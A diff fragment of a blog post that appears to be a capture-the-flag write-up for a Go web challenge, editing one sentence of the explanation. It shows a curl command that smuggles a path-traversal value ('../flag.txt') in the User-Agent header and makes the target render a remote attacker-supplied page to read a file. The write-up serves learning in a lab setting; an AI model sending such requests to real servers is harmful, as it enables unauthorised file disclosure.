bytebl33d/bytebl33d.github.io/_posts/2023-10-28-htboo-ctf-forensics-reversing.md

     </body>
 </html>
 ```
 This page will call the `OutFileContents()` function from the `main.go` file and pass in our UserAgent as a parameter.
 Now why not just pass in the file we want to read?
-Well, since the function expects an argument of type `RequestData`, so we can't actually pass it a string.
+Well, since the function expects an argument of type `RequestData`, so we might not be always able to pass it a string.
 We will have to modify our UserAgent when sending our request.
 We can either do this with BurpSuite, but a simple curl can also do the trick:
 ```
 curl  -H "User-Agent: ../flag.txt" 'http://<IP>:<PORT>/render?use_remote=true&page=https://go.dev/play/p/<ID_TO_OUR_TEST_PAGE>.go?download=true'
 ```